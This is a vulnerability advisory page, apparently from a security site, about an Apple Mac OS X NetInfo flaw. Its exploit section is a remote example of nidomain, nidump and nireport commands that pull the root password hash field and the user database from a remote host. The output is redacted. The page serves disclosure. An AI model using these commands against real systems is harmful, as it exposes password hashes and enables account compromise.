• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Apple Mac OS X nidump Password File Disclosure Vulnerability

The following remote exploitation example was provided by KF <dotslash@snosoft.com>:

% nidomain -l xxx.xxx.net
tag=network udp=797 tcp=798
tag=local udp=795 tcp=796

% nidump -t xxx.xxx.net/network passwd
root:xxxxxxxx.:0:0::0:0:System Administrator:/private/var/root:/bin/tcsh

% nireport -t xxx.xxx.net/network /users name uid
passwd
root 0 xxxxxxxxx.

% nidump -r / -t xxx.xxxx.net/network
{
"master" = ( "localhost/network" );
CHILDREN = (
{
"name" = ( "machines" );
CHILDREN = (
{
"name" = ( "localhost" );
"ip_address" = ( "xxx.xxx.xxx.xxx" );
"serves" = ( "./network", "localhost/local" );
}
)
},
{
"name" = ( "users" );
CHILDREN = (
{
"name" = ( "root" );
"passwd" = ( "xxxxxxxxx." );
"uid" = ( "0" );
"gid" = ( "0" );
"change" = ( "0" );
"expire" = ( "0" );
"realname" = ( "System Administrator" );
"home" = ( "/private/var/root" );
"shell" = ( "/bin/tcsh" );
}
etc.